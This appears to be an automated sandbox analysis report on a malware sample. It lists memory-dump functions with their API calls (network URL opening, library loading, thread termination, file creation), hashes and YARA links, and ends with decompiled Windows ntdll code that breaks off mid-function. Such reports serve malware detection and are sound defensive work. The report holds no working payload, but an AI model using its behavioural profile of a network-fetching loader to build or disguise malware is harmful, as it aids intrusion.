                                                  • Instruction ID: e9631e24a78a65bf7556a2f2758ee17835b480bc36c21d5c0e85d0e4a2d48d13
                                                  • Opcode Fuzzy Hash: a4286f95590b01fff3a525da65590dfe6d270398ce89004be055d89143784aff
                                                  • Instruction Fuzzy Hash: 2E900261601010434140717A895490A40057BE1651791D221E0998510DC5998C6576B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ebb55111cca445a5cb79c70ff6f5f3c1f09099d85256494f1d97968cd43c1199
                                                  • Instruction ID: de4af6521e4ed10167b6d663e55050eaa5e16f4e822f66e1895c7591d913253e
                                                  • Opcode Fuzzy Hash: ebb55111cca445a5cb79c70ff6f5f3c1f09099d85256494f1d97968cd43c1199
                                                  • Instruction Fuzzy Hash: EC90027120141403D100616A492470F000557D0742F91D111E1164515DC6658C5175B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fa6ad603d0f96961ae6c2e55bac0713446ffc47078d35824191d26eeae57252f
                                                  • Instruction ID: 7bf2ae9663edf949ad5e6dd8cead34845075c2ec116a3614643f8fe3b2617202
                                                  • Opcode Fuzzy Hash: fa6ad603d0f96961ae6c2e55bac0713446ffc47078d35824191d26eeae57252f
                                                  • Instruction Fuzzy Hash: FD90026121181043D200657A4D24B0B000557D0743F91D215E0154514CC9558C617571
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 58f78ac86d59acc706d0e407c75562bda10bf61fdb3225b1f62bfc320e7e763f
                                                  • Instruction ID: fe2968b8fd6873cd515c10b5cf393321bd4dc2235e899ae0147c770f2e8eae49
                                                  • Opcode Fuzzy Hash: 58f78ac86d59acc706d0e407c75562bda10bf61fdb3225b1f62bfc320e7e763f
                                                  • Instruction Fuzzy Hash: 2790027120101413D111616A461470B000957D0681FD1D512E0424518DD6968D52B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 98bbebcc917f6c8e801071cf5898e7077436e0ca20e6c0f0a655d3d623b67a5a
                                                  • Instruction ID: 9d70798e11e45d4c90fd5b06692e5052459888c9b607ba54b5c44acd25ee5e8c
                                                  • Opcode Fuzzy Hash: 98bbebcc917f6c8e801071cf5898e7077436e0ca20e6c0f0a655d3d623b67a5a
                                                  • Instruction Fuzzy Hash: EC900261242051535545B16A451450B400667E06817D1D112E1414910CC5669C56F671
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E2898F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 81c3a2b44bcc0861b2f129646d59f5b7e5944a690396f15e0133abc9d392dce3
                                                  • Instruction ID: 689f7b701fbf00f6798501f35843f2f5b1faea09edc8e1546833278acaef9d57
                                                  • Opcode Fuzzy Hash: 81c3a2b44bcc0861b2f129646d59f5b7e5944a690396f15e0133abc9d392dce3
                                                  • Instruction Fuzzy Hash: BD90026160101503D101716A451461A000A57D0681FD1D122E1024515ECA658D92B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 33c0668528c73a602bfc60a745c6ec72ad406e0382f62c090d26fa15f0dc73fd
                                                  • Instruction ID: a62e95997ab3876407ba45ca2ef99843327f4b52677426ca5196175ddd6f45ba
                                                  • Opcode Fuzzy Hash: 33c0668528c73a602bfc60a745c6ec72ad406e0382f62c090d26fa15f0dc73fd
                                                  • Instruction Fuzzy Hash: 0C9002B120101403D140716A451474A000557D0741F91D111E5064514EC6998DD576B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E2899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: dd9cf4b6e9daef12b9ee193553893a8362d45e8bee92ab74f24d923e7b68d920
                                                  • Instruction ID: 43a29ea3866ca1c3569a17679b54d8ec22e7e5122e238f89c82be6872d205dc9
                                                  • Opcode Fuzzy Hash: dd9cf4b6e9daef12b9ee193553893a8362d45e8bee92ab74f24d923e7b68d920
                                                  • Instruction Fuzzy Hash: C59002A134101443D100616A4524B0A000597E1741F91D115E1064514DC659CC527176
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00563197, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00564B00: LoadLibraryA.KERNELBASE(?,595014AD,?,005625AB,?,00000000,00000000,?), ref: 00564B8C
                                                    • Part of subcall function 0056329B: InternetOpenA.WININET(00563A3C,00000000,00000000,00000000,00000000), ref: 005632AF
                                                    • Part of subcall function 0056329B: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563387
                                                  • LdrInitializeThunk.NTDLL ref: 00563AC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InternetOpen$InitializeLibraryLoadThunk
                                                  • String ID: ntdll$user32
                                                  • API String ID: 1998099105-2819403547
                                                  • Opcode ID: 048f8c2f2156fcb293d1a2246081c05093b51cfb58e4bf34c75fb3e342960421
                                                  • Instruction ID: 4d6bcbb493a48c4202221934855372f6b46d7fb361159dba6be235edbc78bd4f
                                                  • Opcode Fuzzy Hash: 048f8c2f2156fcb293d1a2246081c05093b51cfb58e4bf34c75fb3e342960421
                                                  • Instruction Fuzzy Hash: CA5157617193C68EDB21AFB4856A3D67F62BF93350F58805DCCC25B593CB718A02D70A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005649A3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "O%T$"O%T
                                                  • API String ID: 0-1902138262
                                                  • Opcode ID: 60adebc207192f5d7a4e5b1a50adb58f9ebcc492cf5413cbf24c7b9bfff5f173
                                                  • Instruction ID: a40ffcaeae72fd79f3ba373ccce1847e8698e0c7fece810b76ef898bfedf611c
                                                  • Opcode Fuzzy Hash: 60adebc207192f5d7a4e5b1a50adb58f9ebcc492cf5413cbf24c7b9bfff5f173
                                                  • Instruction Fuzzy Hash: 12219DA132C3A25DDF16A6E84069356AF13BEE1762F98408CDDC253953DFD2C8429B1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0056398A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: rX4
                                                  • API String ID: 1029625771-805084833
                                                  • Opcode ID: 1509d23eca76d56dd8ab42d83abb8fac3acf5563feea7fb612c9d81bef3d8deb
                                                  • Instruction ID: 9fbbd8d2ab4751093588be8ea565aa8f686a5c2adf7fc16f7079273d2b5baad5
                                                  • Opcode Fuzzy Hash: 1509d23eca76d56dd8ab42d83abb8fac3acf5563feea7fb612c9d81bef3d8deb
                                                  • Instruction Fuzzy Hash: 3831917161E3D24DD712AFB0419E296BF62FF93310B1C44CDC8C257563DA92C606E75A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0056329B, Relevance: 3.4, APIs: 2, Instructions: 438networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenA.WININET(00563A3C,00000000,00000000,00000000,00000000), ref: 005632AF
                                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563387
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InternetOpen
                                                  • String ID:
                                                  • API String ID: 2038078732-0
                                                  • Opcode ID: 59bf7f4e0141c3a5a3474662b6fb736bcfdc3503a9af51d2ad7c8896feed2149
                                                  • Instruction ID: a49fa6d9f64eefdce85548ee9df5b90221bc57e6311a66cce5f44c09242af642
                                                  • Opcode Fuzzy Hash: 59bf7f4e0141c3a5a3474662b6fb736bcfdc3503a9af51d2ad7c8896feed2149
                                                  • Instruction Fuzzy Hash: A6E135B1740307ABFF315E60CD96BEA3A66BF41740F548528FE89AB2D0D7B58884DB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00563264, Relevance: 3.2, APIs: 2, Instructions: 207librarynetworkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563387
                                                    • Part of subcall function 0056329B: InternetOpenA.WININET(00563A3C,00000000,00000000,00000000,00000000), ref: 005632AF
                                                  • LdrInitializeThunk.NTDLL ref: 00563AC1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InternetOpen$InitializeThunk
                                                  • String ID:
                                                  • API String ID: 518753361-0
                                                  • Opcode ID: 62abd453fe8f837d6aa97954d06fb0df1e8e648c17ba560afe89b807a08738a7
                                                  • Instruction ID: 2facf763433273cb8c79934d9b9f067eb4e798fd3ba3de422170d3c33adafdab
                                                  • Opcode Fuzzy Hash: 62abd453fe8f837d6aa97954d06fb0df1e8e648c17ba560afe89b807a08738a7
                                                  • Instruction Fuzzy Hash: 30618C7170D3C24EEB325B64896A3D67F63FF52311F48848DCCC29B993DAA24645E319
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005632CB, Relevance: 1.6, APIs: 1, Instructions: 134networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563387
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InternetOpen
                                                  • String ID:
                                                  • API String ID: 2038078732-0
                                                  • Opcode ID: ec985e59a9b888c279496f64d48569a8712ad9ce33867a202b1c50ce2c8c00ec
                                                  • Instruction ID: 1db071fd692183ca6503d1d61f98922104b5d3f7729cc480d1093ab682dbea7c
                                                  • Opcode Fuzzy Hash: ec985e59a9b888c279496f64d48569a8712ad9ce33867a202b1c50ce2c8c00ec
                                                  • Instruction Fuzzy Hash: 694155607083838EEF320A64CD567DA7F63BF42311F884859DCC69BAD2DBA24A45D715
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005621BE, Relevance: 1.6, APIs: 1, Instructions: 128threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 005621EE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: TerminateThread
                                                  • String ID:
                                                  • API String ID: 1852365436-0
                                                  • Opcode ID: 0a66fede0b906e785f663b3854d468df6dfb86f0702cd8c3e66d165a7b9138d0
                                                  • Instruction ID: 93b7e5664ee274cd8c42b0236d29ca679cf7c08af5fd393c45b08ad4ea6be4c7
                                                  • Opcode Fuzzy Hash: 0a66fede0b906e785f663b3854d468df6dfb86f0702cd8c3e66d165a7b9138d0
                                                  • Instruction Fuzzy Hash: F3416A70201B02AFE714AE34C9F9B997BA4FF45364F654269EC828B0A2C771CC81CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00562136, Relevance: 1.6, APIs: 1, Instructions: 126threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 005621EE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: TerminateThread
                                                  • String ID:
                                                  • API String ID: 1852365436-0
                                                  • Opcode ID: 0230cee38fbc1dd921bb31abcafbeb0b8276513bd423c7ffe994b4b13846a20d
                                                  • Instruction ID: cbf52d39010579c942bceb58ab97ccc919887025ff8d997193ae1303917f9809
                                                  • Opcode Fuzzy Hash: 0230cee38fbc1dd921bb31abcafbeb0b8276513bd423c7ffe994b4b13846a20d
                                                  • Instruction Fuzzy Hash: 62212770205702AFEB245A24CDF9BED3A64EF52364F754262ED529B1A1D371CC80C612
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00564B2E, Relevance: 1.6, APIs: 1, Instructions: 109libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?,595014AD,?,005625AB,?,00000000,00000000,?), ref: 00564B8C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 73f99f7c34628065ed1b62c9d9e03eee2b3efd96be001d357d801946190513d6
                                                  • Instruction ID: 5502b65bea02201d7f629061bc3285e3900af596ce249c8e1587276941cd31d6
                                                  • Opcode Fuzzy Hash: 73f99f7c34628065ed1b62c9d9e03eee2b3efd96be001d357d801946190513d6
                                                  • Instruction Fuzzy Hash: 99319D726093669FDF05DF6881A525A7F62BE91310B58C05CECC657B43CBB2EC418F45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005631DC, Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL ref: 00563AC1
                                                    • Part of subcall function 00564B00: LoadLibraryA.KERNELBASE(?,595014AD,?,005625AB,?,00000000,00000000,?), ref: 00564B8C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InitializeLibraryLoadThunk
                                                  • String ID:
                                                  • API String ID: 3353482560-0
                                                  • Opcode ID: 4f17c7d84bd5b50d32972a4c7be48297170a76f8adc107bc120f1d831fbe46df
                                                  • Instruction ID: ba3f688887aa07a2f00b0d151eb3e4bf8274af0e6c0d56fba0981581630d8d8b
                                                  • Opcode Fuzzy Hash: 4f17c7d84bd5b50d32972a4c7be48297170a76f8adc107bc120f1d831fbe46df
                                                  • Instruction Fuzzy Hash: 4231AC7171A3D68AD7229FB4456A3D27F63BF93340F58404CCCC207193C6A28601D71A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00563336, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563387
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InternetOpen
                                                  • String ID:
                                                  • API String ID: 2038078732-0
                                                  • Opcode ID: fff523771f7e6814e4a1e70a84710f7aa43f37157a0775e3693aa6491d5c5188
                                                  • Instruction ID: bf02cf5becfc300c068f06b744c4a9b0d2d96d889d8102ee0f63a0775262496b
                                                  • Opcode Fuzzy Hash: fff523771f7e6814e4a1e70a84710f7aa43f37157a0775e3693aa6491d5c5188
                                                  • Instruction Fuzzy Hash: 2F2179703443479AEF314E14CDA6BEE7F56BF41311F948428DD8A9B681DB718A84DA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00562198, Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 005621EE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: TerminateThread
                                                  • String ID:
                                                  • API String ID: 1852365436-0
                                                  • Opcode ID: db2ed1fda8a657bfb1a9f32c374cde08a6a21990a1b3404cc044e45822db28de
                                                  • Instruction ID: a0089d89e05cc1a846e586aa116b37464b37392323238e805a69e04a62e8d9bd
                                                  • Opcode Fuzzy Hash: db2ed1fda8a657bfb1a9f32c374cde08a6a21990a1b3404cc044e45822db28de
                                                  • Instruction Fuzzy Hash: 5E212470201B02AFEB249A24CDF9BED3A64EF52364F740262ED529B1A1E371CC80C612
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00563A2C, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0056329B: InternetOpenA.WININET(00563A3C,00000000,00000000,00000000,00000000), ref: 005632AF
                                                    • Part of subcall function 0056329B: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563387
                                                  • LdrInitializeThunk.NTDLL ref: 00563AC1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InternetOpen$InitializeThunk
                                                  • String ID:
                                                  • API String ID: 518753361-0
                                                  • Opcode ID: 37922eb8933b784cd6700e7e4a4cf6af4504f7047b30ad6a3dbb1bac923dedcc
                                                  • Instruction ID: fddfd0cfb6f45511420ed6e8d17a43193e4b2627d957b45214e260f026b91829
                                                  • Opcode Fuzzy Hash: 37922eb8933b784cd6700e7e4a4cf6af4504f7047b30ad6a3dbb1bac923dedcc
                                                  • Instruction Fuzzy Hash: D5118E72A5F3D259D722ABB0065E142BFA1FE9331075C80CDC0C14B4A3D5869706E3AE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005639EE, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 849e66017016149b19bd1a27601d067c2ca2fe6f708921b70bd51bf149f84b42
                                                  • Instruction ID: d9e31788d7c0cee9bb3a14264c8506706c9ac36afa762faac72a2bacd645c1ee
                                                  • Opcode Fuzzy Hash: 849e66017016149b19bd1a27601d067c2ca2fe6f708921b70bd51bf149f84b42
                                                  • Instruction Fuzzy Hash: A4112B62A6E3D24DD713AB74005B141BF23EEA332175C84CDC4C2578B3D9919607E35E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00564ADA, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?,595014AD,?,005625AB,?,00000000,00000000,?), ref: 00564B8C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: c158805cc9ee66eae9f1ae41c410ff0276a49e325ab9fa8f9ea931fe8279a726
                                                  • Instruction ID: afbca0e6d9152de32f5ffc93b79726e6c0edba32e9565a9e5e5af9ffcdaa6053
                                                  • Opcode Fuzzy Hash: c158805cc9ee66eae9f1ae41c410ff0276a49e325ab9fa8f9ea931fe8279a726
                                                  • Instruction Fuzzy Hash: 7AF08B5131831749DF086A2685A972B9D02EFE0760F24861CEDE293161DFD5C8441A19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00562FAA, Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00562F84,00563011), ref: 00562FCD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 964323d7d9ff80bfafd8c2a463c2788c196ebb6c8c10258cf0772213c7cd4ff7
                                                  • Instruction ID: 8e874393603ba8837d0b99948a0b274af67f60583a65b3a20b00deb9a615eab9
                                                  • Opcode Fuzzy Hash: 964323d7d9ff80bfafd8c2a463c2788c196ebb6c8c10258cf0772213c7cd4ff7
                                                  • Instruction Fuzzy Hash: D9D01270BE5341B9FB3016206D1BFC51A175B51B61FB44009BF853D9C2D2D25555521F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00562F95, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00562F84,00563011), ref: 00562FCD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 4c1d42ce430af45ecf636fad266444b41d4c29fe7dea2f70d211837a0a4c5ac0
                                                  • Instruction ID: fe183df0077f3e46872fc708b2bf751afb372029793c978d6e664e7ffe4ddf74
                                                  • Opcode Fuzzy Hash: 4c1d42ce430af45ecf636fad266444b41d4c29fe7dea2f70d211837a0a4c5ac0
                                                  • Instruction Fuzzy Hash: 1FD01230BD4301B6F7344720AC5BFDAA2666B91F10FB44009FF4A7E5C082E1AA58962A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E28967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: df307c1fc36720b6f48b2677198bae93134abed4f14ed2788814e65e6edfea31
                                                  • Instruction ID: 80a149594f897f332a625e21786cefcaad0fc0465865fe515dee97230a2fa6cb
                                                  • Opcode Fuzzy Hash: df307c1fc36720b6f48b2677198bae93134abed4f14ed2788814e65e6edfea31
                                                  • Instruction Fuzzy Hash: 56B09B719014D6C7D601D7714718B1B7A4177D0741F66C151D1070645E4778C491F5B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 1E278E00, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 44%
                                                  			E1E278E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1e33d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1e338464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1e335780 & 0x00000003) != 0) {
							E1E2C5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1e335780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1E28B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1e337984; // 0x9f2b20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1e338464; // 0x75150110
					 *0x1e33b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1E279B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
